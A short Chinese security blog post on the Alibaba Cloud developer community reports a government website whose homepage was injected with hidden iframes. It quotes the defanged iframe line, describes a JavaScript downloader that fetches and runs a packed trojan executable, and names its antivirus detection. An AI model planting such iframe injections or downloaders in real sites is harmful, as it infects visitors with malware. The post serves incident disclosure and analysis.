AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

又一个下载恶意文件的政府网站

2024-09-29 23
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 又一个下载恶意文件的政府网站

首页有3处地方被加入:

/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3  加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul。


文章标签:
JavaScript
前端开发
游客qeoynko2nmbgk
目录
相关文章
黑客网络安全
|
安全 Linux 网络安全
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
黑客网络安全
77 0
渗透攻击实例-黑客大佬们都浏览哪些网站?
游客qeoynko2nmbgk
|
26天前
|
监控 JavaScript 前端开发
两个会自动下载恶意程序文件的政府网站
两个会自动下载恶意程序文件的政府网站
游客qeoynko2nmbgk
25 1
游客qeoynko2nmbgk
|
26天前
两个下载恶意程序文件的政府网站换花样了
两个下载恶意程序文件的政府网站换花样了
游客qeoynko2nmbgk
25 1
游客qeoynko2nmbgk
|
26天前
|
安全 数据安全/隐私保护
一个被挂木马的政府网站
一个被挂木马的政府网站
游客qeoynko2nmbgk
92 1
GG2020gg
|
29天前
|
安全 应用服务中间件 开发工具
Web安全-SVN信息泄露漏洞分析
Web安全-SVN信息泄露漏洞分析
GG2020gg
100 2
游客qeoynko2nmbgk
|
26天前
|
安全
又一个被挂木马的政府网站(第3版)
又一个被挂木马的政府网站(第3版)
游客qeoynko2nmbgk
27 0
九芒星#
|
开发框架 安全 前端开发
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
九芒星#
386 0
网站安全
|
缓存 安全 搜索推荐
蓝科lankecms漏洞导致被黑客攻击篡改首页文件
近期受到很多用蓝科lankecms网站源码做的网站的客户反馈首页文件index.html和m.html被篡改增加了跳转代码,导致从百度点击进来的直接跳转到世界杯体育网站上去,而且百度快照收录的标题也被篡改了,通过客户的叙述,发现此源码是用tp架构二次开发的,其中源码文件LoginAction.class.php和TextAction.class.php被作者加密了,具体内容无法解密,用的是混淆加密,被篡改的客户基本都是在同一时间批量被篡改,跳转的网址也是一致的,了解情况后我们SINE安全立即安全技术对客户网站进行排查和溯源。
网站安全
349 0
不吃西红柿丶
|
安全 Linux 网络安全
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
不吃西红柿丶
331 0
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
网站安全
|
SQL 安全 关系型数据库
公司网站被劫持到其它网站如何解决
公司网站被劫持到其它网站如何解决
网站安全
364 0
公司网站被劫持到其它网站如何解决

热门文章

最新文章

  • 1
    proxy error: could not proxy request解决方案
  • 2
    OSS-Android SDK 搭建总结
  • 3
    Nginx系列教程(13) - TCP反向代理实现
  • 4
    2.3. FFmpeg
  • 5
    Waymo真·无人车上路了!没司机的出租车推出在即 | 多图实拍
  • 6
    Net设计模式实例之中介者模式(Mediator Pattern)(2)
  • 7
    [Silverlight]奇技银巧系列-2
  • 8
    查询离某个时间最近的记录
  • 9
    物联网将如何改善社会运行效率?
  • 10
    07.LoT.UI 前后台通用框架分解系列之——轻巧的文本编辑器
  • 1
    XML DOM 遍历节点树
    25
  • 2
    蚂蚁seo的蜘蛛池原理与如何使用?
    32
  • 3
    AI师傅和通义灵码合作助力你学编程
    29
  • 4
    05.静态代理设计模式
    29
  • 5
    ‘分布式事务‘ 圣经:从入门到精通,架构师尼恩最新、最全详解 (50+图文4万字全面总结 )
    26
  • 6
    利用云原生技术优化微服务架构
    8
  • 7
    掌握现代化JavaScript:ECMAScript提案与特性
    8
  • 8
    利用Serverless架构优化成本和可伸缩性
    10
  • 9
    真没想到!虚拟线程竟然这样提高程序效率!
    12

    • 相关课程

    更多
  • 互联网安全-移动APP漏洞风险与解决方案

    • 相关电子书

    更多
  • 网站/服务器取证 实践与挑战
  • 网站/服务器取证实践与挑战
  • 如何完成一份像样的互联网金融APP安全检测报告

    • 相关实验场景

    更多
  • 网站用户流量分析—适用于电商网站、资讯网站、游戏主站等各类Web站点场景
    • 下一篇
    AI助理直击要害,从繁复中提炼精华——使用CDN加速访问OSS存储的图片